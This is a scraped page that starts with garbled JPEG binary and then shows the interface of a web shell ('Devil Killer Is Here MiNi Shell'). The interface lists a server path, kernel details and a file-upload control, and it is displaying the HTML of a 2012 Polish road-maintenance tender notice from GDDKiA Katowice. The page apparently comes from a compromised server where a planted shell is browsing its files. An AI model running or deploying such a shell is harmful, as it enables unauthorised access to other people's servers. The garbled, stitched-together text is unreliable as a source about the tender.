JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/418788-N-2012.html

<p class="kh_header"><b>Katowice: Roboty drogowe i utrzymaniowe na terenie administrowanym przez GDDKiA Oddział w Katowicach Rejon Wysoki Brzeg</b><br>
<b>Numer ogłoszenia: 418788 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Katowicach , ul. Myśliwska 5, 40-017 Katowice, woj. śląskie, tel. 032 2586281, faks 032 2598710.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gddkia.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty drogowe i utrzymaniowe na terenie administrowanym przez GDDKiA Oddział w Katowicach Rejon Wysoki Brzeg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest robota budowlana pn.: Roboty drogowe i utrzymaniowe na terenie administrowanym przez GDDKiA Oddział w Katowicach Rejon Wysoki Brzeg w podziale na dwie części:
Część nr 1 pn.: Kompleksowe utrzymanie korpusu drogowego
Część nr 2 pn.: Oznakowanie i bezpieczeństwo
Wszystkie asortymenty robót i usług, objęte niniejszą specyfikacją, zostały podzielone na niżej wymienione grupy:
Część nr 1:	obejmująca KOMPLEKSOWE UTRZYMANIE KORPUSU DROGOWEGO
Grupa robót nr 1 : 	NAWIERZCHNIA DRÓG KRAJOWYCH
Grupa robót nr 2 : 	POBOCZA
Grupa robót nr 3 : 	ODWODNIENIE
Grupa robót nr 4 : 	CHODNIKI, ŚCIEŻKI ROWEROWE
Grupa robót  nr 11 : 	POZOSTAŁE WYDATKI ZWIĄZANE Z UTRZYMANIEM SIECI DRÓG KRAJOWYCH - CAŁODOBOWY PATROL UTRZYMANIA AUTOSTRADY 
Część nr 2:	obejmująca OZNAKOWANIE I BEZPIECZEŃSTWO
Grupa robót nr 5 : 	OZNAKOWANIE
Grupa robót nr 6 : 	BEZPIECZEŃSTWO
2.	Szczegółowo zakres przedmiotu zamówienia określony został w Tomach II - IV Specyfikacji Istotnych Warunków Zamówienia.
3.	Zamówienie będzie realizowane zgodnie z prawem polskim, w szczególności z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.), ustawą z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz. U. Nr 16 poz. 93 ze zm.) i ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2010 r., Nr 113, poz. 759 ze zm.). Wykonawca robót musi zapewnić wykonanie robót zgodnie z prawem polskim, w szczególności z przepisami techniczno-budowlanymi, przepisami dotyczącymi samodzielnych funkcji technicznych w budownictwie oraz przepisami dotyczącymi wyrobów, materiałów stosowanych w budownictwie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.00.00-5, 45.23.30.00-9, 45.23.31.42-6, 45.23.31.39-3, 45.23.32.23-8, 45.23.32.22-1, 45.23.32.90-8, 45.23.32.80-5, 50.23.00.00-6, 50.23.20.00-0, 90.00.00.00-7, 90.51.10.00-2, 45.23.24.00-6, 45.11.12.00-0, 45.11.21.00-6, 45.11.22.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 
a) 140.000,00 PLN (słownie: sto czterdzieści tysięcy złotych) - w przypadku złożenia oferty na Część nr 1 pn.: Kompleksowe utrzymanie korpusu drogowego,
b) 50.000, 00 PLN (słownie: pięćdziesiąt tysięcy złotych) - - w przypadku złożenia oferty na Część nr 2 pn.: Oznakowanie i bezpieczeństwo.
2.   Wadium musi być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy
a)	pieniądzu, przelewem na rachunek bankowy:
Bank Gospodarstwa Krajowego /O Katowice Nr 16 1130 1091 0003 9079 2490 0001
b)	poręczeniach bankowych;
c)	poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo-kredytowej;
d)	gwarancjach bankowych;
e)	gwarancjach ubezpieczeniowych;
f)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3 Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i  musi obejmować cały okres związania ofertą.
Wadium wnoszone w ww. formie powinno być wystawione: GDDKiA Oddział   Katowice ul. Myśliwska 5, 40-017 Katowice.
W przypadku wniesienia wadium w formie poręczeń lub gwarancji, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę, określone w art. 46 ust. 4a i 5 ustawy pzp.
4. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 2.a) rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku złożenia oferty na Część nr 1, Wykonawca musi wykazać:
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) co najmniej 2 zamówienia o wartości nie niższej niż 10 mln zł brutto łącznie. Przedmiotem każdego z tych zamówień musi być budowa, przebudowa, remont lub utrzymanie drogi klasy co najmniej GP.
Jako wykonanie należy rozumieć doprowadzenie co najmniej do wystawienia Świadectwa Przejęcia/Protokołu odbioru robót.
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC) lub na dzień podpisania Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia).
W przypadku złożenia oferty na Część nr 2, Wykonawca musi wykazać:
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) co najmniej:
- 2 zamówienia o wartości nie niższej niż 200 tys. zł brutto łącznie. Przedmiotem każdego z tych zamówień musi być budowa, przebudowa, remont lub utrzymanie oznakowania na drodze klasy co najmniej GP.
- 2 zamówienia o wartości nie niższej niż 200 tys. zł brutto łącznie. Przedmiotem każdego z tych zamówień musi być budowa, przebudowa, remont lub utrzymanie oświetlenia na drodze klasy co najmniej GP.
- 2 zamówienia o wartości nie niższej niż 1 mln zł brutto łącznie. Przedmiotem każdego z tych zamówień musi być budowa, przebudowa, remont lub utrzymanie barier energochłonnych na drodze klasy co najmniej GP.
Jako wykonanie należy rozumieć doprowadzenie co najmniej do wystawienia Świadectwa Przejęcia/Protokołu odbioru robót.
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC) lub na dzień podpisania Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku złożenia oferty na Część nr 1, Wykonawca musi wykazać:
Wykonawca musi wykazać narzędzia i urządzenia* wymienione w ilości minimalnej poniżej: 
1.	Frezarka do nawierzchni drogowych o szerokości ścinania min. 1,0 m	- 1 szt.
2.	Rozściełacz mas bitumicznych o szer. rozkładania nawierzchni do 1,5m	- 1 szt.
3.	Rozściełacz mas bitumicznych o szer. rozkładania nawierzchni do 4,5 m	- 1 szt.
4.	J.w. lecz o szerokości rozkładania nawierzchni do 9,0 m	- 1 szt.
5.	Walce statyczne 0,9 - 9,0 Mg - 5 szt.
6.	Recyklery do przetwarzania destruktu - frezu dla wykonania remontu cząstkowego nawierzchni bitumicznych - 3 szt.
7.	Zamiatarki do czyszczenia mechanicznego jezdni i warstw bitumicznych	- 2 szt.
8.	Zwyżka montażowa do 24 metrów - 2 szt.
9.	Wielozadaniowy samochód specjalistyczny np. UNIMOG wraz z osprzętem (pogłębiarka do rowów, oraz ścinarka do poboczy) lub równoważny -	2 szt.
10.	Samochody ciężarowe o ład. 5,0 - 25 Mg - 12 szt.
11.	Koparko - ładowarki - 4 szt.
12.	Młoty pneumatyczne w zestawie z kompresorem	 -3 szt.
13.	Agregaty prądotwórcze- 3 szt.
14.	Piły spalinowe do cięcia nawierzchni drogowych -	5 szt.
15.	Zagęszczarki płytowe do zagęszczania podłoża	- 3 szt.
16.	Spalinowe ubijarki stopowe do zagęszczania nawierzchni-	3 szt.
17.	Wytwórnia mieszanek min-bit. o wydajności min. 60t/h	- 1 szt.
18.	Zestaw sygnalizacji wahadłowej - 1 szt.
19.	Przyczepka sygnalizacyjna U-26a z pojazdem ciągnącym	- 6 szt.
20.	Przyczepka sygnalizacyjna U-27 z pojazdem ciągnącym	- 2szt. 
21	Przyczepka sygnalizacyjna U-27 zmiennej treści LED z pojazdem ciągnącym - 2 szt.
22.	Pompa o wydajności min. 250m3/h	- 1 szt.
23.	Pojazd do patrolu autostrady (zgodnie z wymaganiami w SST wraz z przyczepką sygnalizacyjną U-27 zmiennej treści LED) - 1 szt.
24.	Samochód ciężarowy z HDS-em - 2 szt.
25.	Samochód ssąco-ciśnieniowy - 1 szt.
26.	Skrapiarka do bitumu - 1 szt.

W przypadku złożenia oferty na Część nr 2, Wykonawca musi wykazać:
Wykonawca musi wykazać narzędzia i urządzenia* wymienione w minimalnej ilości poniżej: 
1.	Samochody ciężarowe o ład. 5,0 - 25 Mg -12 szt.
2.	Koparko - ładowarki - 4 szt.
3.	Młoty pneumatyczne w zestawie z kompresorem	- 3 szt.
4.	Agregaty prądotwórcze	- 3 szt.
5.	Piły spalinowe do cięcia nawierzchni drogowych	- 5 szt.
6.	Zagęszczarki płytowe do zagęszczania podłoża	- 3 szt.
7.	Spalinowe ubijarki stopowe do zagęszczania nawierzchni	- 3 szt.
8.	Zestaw sygnalizacji wahadłowej	- 1 szt.
9.	Przyczepka sygnalizacyjna U-26a z pojazdem ciągnącym	- 6 szt.
10.	Przyczepka sygnalizacyjna U-27 z pojazdem ciągnącym	- 2 szt.
11.	Kafary do wbijania barier energochłonnych	- 3 szt.
12.	Lokalizator tras kablowych	- 1 szt.
13.	Urządzenia do pomiarów sieci kablowych i uziemień -	1 szt.
14.	Sprzęt do pomiarów sieci kablowych i uziemień	- 1 szt.
15.	Zwyżka montażowa do 12 m	- 1 szt.
16.	Przyczepka sygnalizacyjna U-27 zmiennej treści LED z pojazdem ciągnącym	- 2 szt.

*UWAGA! 
W przypadku złożenia oferty na dwie części, potencjał techniczny, o którym mowa wyżej należy wykazać, oddzielnie dla każdej z części, na którą Wykonawca składa ofertę. Wykonawca nie może wykazać tego samego potencjału technicznego dla Części nr 1 i 2.
Wyżej wymieniony sprzęt musi być sprawny technicznie. Poza wyżej wymienionymi jednostkami, dla każdej z części, Wykonawca będzie zobowiązany dysponować w celu realizacji zamówienia sprzętem wskazanym w STWiORB, w ilości oraz o parametrach niezbędnych dla realizacji przedmiotowego zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku złożenia oferty na Część nr 1, Wykonawca musi wykazać potencjał kadrowy**:
Wykonawca musi wskazać osoby, która będą uczestniczyć w wykonywaniu zamówienia, legitymujące się doświadczeniem i kwalifikacjami (uprawnieniami) odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca, wskaże osoby na funkcje wymienione poniżej, która spełniają następujące wymagania:  
A) Osoba proponowana do pełnienia funkcji: Kierownik budowy
- wymagana liczba osób: 1
- minimalne doświadczenie i kwalifikacje: 
a)	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności - konstrukcyjno-budowlanej lub drogowej albo równoważne wydane na podstawie wcześniejszych przepisów;
b)	wykonawca musi wykazać, że osoba proponowana na tę funkcję, brała udział jako kierownik budowy/robót w realizacji co najmniej 2 zamówień polegających na budowie, przebudowie, remoncie lub utrzymaniu drogi klasy co najmniej GP. 
B) Osoba proponowana do pełnienia funkcji: Kierownik Robót
- wymagana liczba osób: 1
- minimalne doświadczenie i kwalifikacje: 
a)	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności - konstrukcyjno-budowlanej lub drogowej albo równoważne wydane na podstawie wcześniejszych przepisów;
b) 	wykonawca musi wykazać, że osoba proponowana na tę funkcję, brała udział jako kierownik budowy/robót w realizacji co najmniej 2 zamówień polegających na budowie, przebudowie, remoncie lub utrzymaniu drogi klasy co najmniej GP.
C) Osoby do kierowania ruchem
a) wymagana liczba osób: 10
b) minimalne kwalifikacje: Osoby te muszą posiadać ważne - uprawnienia do kierowania ruchem wynikające z przepisów rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lipca 2010 roku w sprawie kierowania ruchem drogowym (Dz. U. Nr 123 poz. 840) lub równoważne.
Zamawiający nie dopuszcza przedstawienia tej samej osoby do pełnienia kilku funkcji (więcej niż jednej), wskazanych w pkt A) i B).
W przypadku złożenia oferty na Część nr 2, Wykonawca musi wykazać potencjał kadrowy**:
Wykonawca musi wskazać osoby, która będą uczestniczyć w wykonywaniu zamówienia, legitymujące się doświadczeniem i kwalifikacjami (uprawnieniami) odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca, wskaże osoby na funkcje wymienione poniżej, która spełniają następujące wymagania: 
A) Osoba proponowana do pełnienia funkcji: Kierownik budowy
- wymagana liczba osób: 1
- minimalne doświadczenie i kwalifikacje: 
a)	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności - konstrukcyjno-budowlanej lub drogowej albo równoważne wydane na podstawie wcześniejszych przepisów;
b)	wykonawca musi wykazać, że osoba proponowana na tę funkcję, brała udział jako kierownik budowy/robót w realizacji co najmniej 2 zamówień polegających na budowie, przebudowie, remoncie lub utrzymaniu drogi klasy co najmniej GP. 
B) Osoba proponowana do pełnienia funkcji: Kierownik Robót w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
- wymagana liczba osób: 1	
- minimalne doświadczenie i kwalifikacje: 
a)	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów;
b) 	wykonawca musi wykazać, że osoba proponowana na tę funkcję: 
- brała udział jako kierownik budowy/robót w realizacji co najmniej 2 zamówień polegających na budowie, przebudowie, remoncie lub utrzymaniu drogi klasy co najmniej GP albo 
- brała udział jako kierownik budowy/robót w realizacji co najmniej 2 zamówień polegających na budowie, przebudowie, remoncie lub utrzymaniu oświetlenia na drodze klasy co najmniej GP
C) Osoby do kierowania ruchem
a) wymagana liczba osób: 10
b) minimalne kwalifikacje: Osoby te muszą posiadać ważne - uprawnienia do kierowania ruchem wynikające z przepisów rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lipca 2010 roku w sprawie kierowania ruchem drogowym (Dz. U. Nr 123 poz. 840) lub równoważne.
Zamawiający nie dopuszcza przedstawienia tej samej osoby do pełnienia kilku funkcji (więcej niż jednej), wskazanych w pkt A) i B).
**UWAGA! 
W przypadku złożenia oferty na dwie części, osoby wskazane na funkcje 
i w ilości, o których mowa wyżej należy wykazać oddzielnie dla każdej 
z części, na którą Wykonawca składa ofertę. Wykonawca nie może wykazać tego samego potencjału kadrowego dla Części nr 1 i 2.
Osoby przedstawione powyżej stanowić będą podstawowy skład personelu, jakim Wykonawca będzie zobowiązany dysponować podczas realizacji zamówienia. Wykonawca będzie zobowiązany, poza wyżej wymienionym zespołem osób, 
do skierowania w celu wykonywania zamówienia takiej ilości osób, która zapewnieni ciągłe i bieżące kompleksowe utrzymanie dróg.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferta (odpowiednio dla danej części zamówienia). 2. Kosztorys ofertowy dla danej części oraz wypełniony wykaz stawek i narzutów dla danej części.
3. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii. 4. Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. 5. Potwierdzenie wniesienia wadium w formie gotówki lub oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz. 6. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, lub inny dokument w celu udokumentowania właściwej reprezentacji Wykonawcy. 7. W sytuacji gdy Wykonawca, polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
